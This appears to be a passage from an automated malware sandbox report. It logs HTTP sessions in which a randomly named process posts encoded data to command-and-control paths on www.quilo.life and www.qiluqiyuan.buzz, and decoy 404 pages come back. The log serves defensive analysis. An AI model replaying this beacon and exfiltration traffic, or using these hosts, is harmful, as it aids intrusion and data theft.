                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              18192.168.2.558663203.161.43.22880728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:31:04.654110909 CEST738OUTPOST /ftr3/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.quilo.life
                              Origin: http://www.quilo.life
                              Referer: http://www.quilo.life/ftr3/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 223
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 32 69 4a 7a 63 6a 4c 65 45 64 76 75 45 50 30 73 58 50 38 47 6d 45 63 2b 76 79 78 75 68 57 4d 54 74 50 4a 36 44 6f 62 4e 35 69 69 30 6d 48 2f 66 34 44 4d 41 49 32 51 63 45 53 53 76 63 45 53 56 69 6e 73 59 6f 62 34 76 65 4d 71 6c 5a 45 39 56 35 75 43 71 2f 4f 42 5a 41 61 4b 62 36 73 6b 33 31 75 47 32 47 76 31 39 61 4f 4f 76 72 43 74 54 30 4a 6a 38 54 5a 76 79 70 57 31 35 76 55 53 53 4c 6c 63 71 41 45 61 54 6d 74 5a 6a 79 57 6d 68 56 75 63 4d 45 71 34 2b 4f 6a 65 65 31 4d 32 61 33 50 65 56 4d 30 73 6a 59 2f 64 61 34 39 58 6f 30 6c 58 42 77 69 73 33 6f 4e 6c 36 4d 74 69 76 55 47 58 62 47 6c 4e 33 51 73 32 74 45 51 74 2b 31 55 6f 41 65 67 66 30 6b 65 53 64
                              Data Ascii: bX=2iJzcjLeEdvuEP0sXP8GmEc+vyxuhWMTtPJ6DobN5ii0mH/f4DMAI2QcESSvcESVinsYob4veMqlZE9V5uCq/OBZAaKb6sk31uG2Gv19aOOvrCtT0Jj8TZvypW15vUSSLlcqAEaTmtZjyWmhVucMEq4+Ojee1M2a3PeVM0sjY/da49Xo0lXBwis3oNl6MtivUGXbGlN3Qs2tEQt+1UoAegf0keSd
                              Sep 16, 2024 09:31:05.234532118 CEST658INHTTP/1.1 404 Not Found
                              Date: Mon, 16 Sep 2024 07:31:05 GMT
                              Server: Apache
                              Content-Length: 514
                              Connection: close
                              Content-Type: text/html
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              19192.168.2.558664203.161.43.22880728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:31:07.203464985 CEST1755OUTPOST /ftr3/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.quilo.life
                              Origin: http://www.quilo.life
                              Referer: http://www.quilo.life/ftr3/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 1239
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 32 69 4a 7a 63 6a 4c 65 45 64 76 75 45 50 30 73 58 50 38 47 6d 45 63 2b 76 79 78 75 68 57 4d 54 74 50 4a 36 44 6f 62 4e 35 69 71 30 6c 31 33 66 2b 69 4d 41 4a 32 51 63 62 69 53 73 63 45 53 59 69 6e 46 51 6f 62 31 59 65 50 43 6c 4c 32 31 56 2b 66 43 71 30 4f 42 5a 4e 36 4b 65 31 4d 6b 6d 31 6f 6e 2f 47 76 6c 39 61 4f 4f 76 72 41 46 54 6a 4e 2f 38 52 5a 76 74 39 47 31 31 6b 30 53 32 4c 6c 46 64 41 45 66 6b 6d 63 35 6a 79 33 57 68 5a 37 49 4d 49 71 34 77 4c 6a 66 42 31 4d 36 4a 33 50 43 5a 4d 31 49 4a 59 34 52 61 37 62 69 45 6b 6e 4c 48 71 52 73 7a 6f 65 39 55 4e 72 53 42 61 6d 43 78 46 56 46 75 52 75 61 67 55 57 68 42 31 77 39 66 42 55 37 4d 70 35 72 50 77 39 47 35 70 5a 79 6e 71 51 47 69 5a 36 6f 7a 70 6e 70 6f 74 44 35 76 77 50 50 52 56 6c 41 64 52 64 51 7a 7a 6c 6d 46 6b 52 63 2f 55 42 53 48 4e 57 30 51 49 48 30 5a 6f 70 59 75 47 4b 64 7a 70 38 6b 6d 54 39 33 35 39 65 79 5a 56 36 68 69 78 44 74 49 68 35 4c 2b 43 55 45 47 73 48 62 6c 2f 4e 66 6c 46 4d 30 62 5a 56 35 4e 57 74 35 6a 68 31 39 [TRUNCATED]
                              Data Ascii: bX=2iJzcjLeEdvuEP0sXP8GmEc+vyxuhWMTtPJ6DobN5iq0l13f+iMAJ2QcbiSscESYinFQob1YePClL21V+fCq0OBZN6Ke1Mkm1on/Gvl9aOOvrAFTjN/8RZvt9G11k0S2LlFdAEfkmc5jy3WhZ7IMIq4wLjfB1M6J3PCZM1IJY4Ra7biEknLHqRszoe9UNrSBamCxFVFuRuagUWhB1w9fBU7Mp5rPw9G5pZynqQGiZ6ozpnpotD5vwPPRVlAdRdQzzlmFkRc/UBSHNW0QIH0ZopYuGKdzp8kmT9359eyZV6hixDtIh5L+CUEGsHbl/NflFM0bZV5NWt5jh19Qj5EpFr97y4eKU+FB5zVOIk8rVfAf9EKYQriv6U4mZiRW5Rp7//1SSU+v+UaSEMbHyXOa1IR33WxrbwknakN081UuQxRPZIUn5Z6B0FEosdxpnw2gOFVwZBgLSPzOGdbnw34YUlOSmaHvHb3H/vFerKPTiWyUqOIe/mzWArz0F83Lj0/qxU3UT0y0lAW9xnsG8sGj6mYDxPuHjTBSQs65sIoYmnuM9McidoE5lA0McUw4gtQVD+HH+cZ/4+leGYt0A33X3Qz7Rsqgd7i+rp0hmdwJTtFEdZHuVIZNUF2J18ZKJkF8QU5FA9oqvcsM0S7sjK8jJTU8ZVVfuVI6PPxPb+WVI+hkB4ZG+VgzfR98vM0OhqgmQ6jhue6tgunewok+Gl9OWeKrAI+oQ+jyEXAr0fvX4nQhzoGLECl3JhybNO+fft4CGkdUNE1ODYYsc/zFK84hv0b4Q9cDmFgMPbzRW7c1IZe1WlncUlz1GWUftSVvjSykqto4l1YaouZRkHqyt26oIMgmT6fk8SbiNU90cHvXegXUM6KhKH0bD/gxYriJZTPl1osZLVwlsHjZjnZYV98poPJDvnNs8QEM4dDfGFF4IveSoO1P+l+KQl+q9uyCayaIEJOdKnStv8RHIwEUmJYRvzRwfdU2SEG6KQSaLODmUo4orae8e [TRUNCATED]
                              Sep 16, 2024 09:31:07.820034027 CEST658INHTTP/1.1 404 Not Found
                              Date: Mon, 16 Sep 2024 07:31:07 GMT
                              Server: Apache
                              Content-Length: 514
                              Connection: close
                              Content-Type: text/html
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              20192.168.2.558665203.161.43.22880728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:31:09.747811079 CEST460OUTGET /ftr3/?bX=7ghTfXuNFdv7bt0fQ6dp+VYKrg9F0VottJoldp68xQSgk3fAwjETInI5bmz0SHizsmBfpbcRVbCgLhFU68m+g+0qN5CZ17IzjLi3DtoRUNuK8DdWmd+CTazIxVVgqHT8dA==&RFRd_=tFLD HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Language: en-US,en
                              Host: www.quilo.life
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Sep 16, 2024 09:31:10.330846071 CEST673INHTTP/1.1 404 Not Found
                              Date: Mon, 16 Sep 2024 07:31:10 GMT
                              Server: Apache
                              Content-Length: 514
                              Connection: close
                              Content-Type: text/html; charset=utf-8
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              21192.168.2.558666161.97.168.24580728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:31:15.410332918 CEST733OUTPOST /wjff/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.qiluqiyuan.buzz
                              Origin: http://www.qiluqiyuan.buzz
                              Referer: http://www.qiluqiyuan.buzz/wjff/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 203
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 31 49 39 71 4e 58 37 56 4c 47 44 72 52 4d 43 66 79 5a 38 61 44 63 48 4b 35 4e 4e 2b 46 37 65 32 6b 70 4f 6d 34 4c 42 49 66 42 78 4e 47 33 4f 30 43 65 7a 74 35 52 47 38 6d 50 4e 71 44 54 62 46 41 78 70 59 6c 79 2f 4d 67 45 43 59 43 51 6e 39 75 35 74 50 46 65 59 45 4f 4b 74 2f 47 2b 77 56 30 33 43 30 78 51 57 66 50 44 74 31 77 2f 7a 70 33 39 2b 35 61 74 31 6a 30 49 42 52 45 34 36 49 6a 38 54 34 6e 74 7a 6f 41 53 7a 6a 42 54 37 79 77 68 62 47 44 50 77 6f 47 4a 38 57 48 49 77 38 59 68 4e 44 47 7a 48 71 7a 58 69 30 6c 79 4e 67 37 54 2f 55 56 31 4d 2b 6a 43 5a 53 64 4d 39 71 73 6f 54 6d 70 65 77 3d
                              Data Ascii: bX=1I9qNX7VLGDrRMCfyZ8aDcHK5NN+F7e2kpOm4LBIfBxNG3O0Cezt5RG8mPNqDTbFAxpYly/MgECYCQn9u5tPFeYEOKt/G+wV03C0xQWfPDt1w/zp39+5at1j0IBRE46Ij8T4ntzoASzjBT7ywhbGDPwoGJ8WHIw8YhNDGzHqzXi0lyNg7T/UV1M+jCZSdM9qsoTmpew=
                              Sep 16, 2024 09:31:16.021503925 CEST1236INHTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Mon, 16 Sep 2024 07:31:15 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Vary: Accept-Encoding
                              ETag: W/"66cd104a-b96"
                              Content-Encoding: gzip
                              Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                              Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                              Sep 16, 2024 09:31:16.021528006 CEST370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                              Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              22192.168.2.558667161.97.168.24580728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:31:17.953509092 CEST753OUTPOST /wjff/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.qiluqiyuan.buzz
                              Origin: http://www.qiluqiyuan.buzz
                              Referer: http://www.qiluqiyuan.buzz/wjff/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 223
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 31 49 39 71 4e 58 37 56 4c 47 44 72 51 74 79 66 2f 61 45 61 4c 63 48 4e 38 4e 4e 2b 53 72 65 79 6b 6f 79 6d 34 4c 6f 4e 63 7a 6c 4e 47 56 6d 30 44 63 4c 74 30 78 47 38 74 76 4e 56 4f 7a 62 61 41 78 73 37 6c 77 62 4d 67 46 6d 59 43 53 76 39 75 75 5a 41 45 4f 59 43 47 71 74 39 49 65 77 56 30 33 43 30 78 51 53 78 50 44 6c 31 7a 4f 44 70 77 70 69 34 57 4e 31 67 7a 49 42 52 58 6f 36 4d 6a 38 54 4f 6e 73 2f 4f 41 58 76 6a 42 54 4c 79 77 77 62 48 4a 50 77 78 43 4a 39 58 58 39 56 74 66 6d 74 71 43 77 6e 6a 76 55 6d 69 74 6b 67 4b 68 78 33 38 47 56 67 47 7a 52 52 6c 4d 38 63 44 32 4c 44 57 33 4a 6b 32 53 77 37 30 49 76 32 67 71 30 4c 5a 64 61 6c 79 6a 59 55 2f
                              Data Ascii: bX=1I9qNX7VLGDrQtyf/aEaLcHN8NN+Sreykoym4LoNczlNGVm0DcLt0xG8tvNVOzbaAxs7lwbMgFmYCSv9uuZAEOYCGqt9IewV03C0xQSxPDl1zODpwpi4WN1gzIBRXo6Mj8TOns/OAXvjBTLywwbHJPwxCJ9XX9VtfmtqCwnjvUmitkgKhx38GVgGzRRlM8cD2LDW3Jk2Sw70Iv2gq0LZdalyjYU/
                              Sep 16, 2024 09:31:18.573765993 CEST1236INHTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Mon, 16 Sep 2024 07:31:18 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Vary: Accept-Encoding
                              ETag: W/"66cd104a-b96"
                              Content-Encoding: gzip
                              Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                              Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                              Sep 16, 2024 09:31:18.573797941 CEST370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                              Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              23192.168.2.558668161.97.168.24580728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:31:20.496243000 CEST1770OUTPOST /wjff/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.qiluqiyuan.buzz
                              Origin: http://www.qiluqiyuan.buzz
                              Referer: http://www.qiluqiyuan.buzz/wjff/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 1239
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
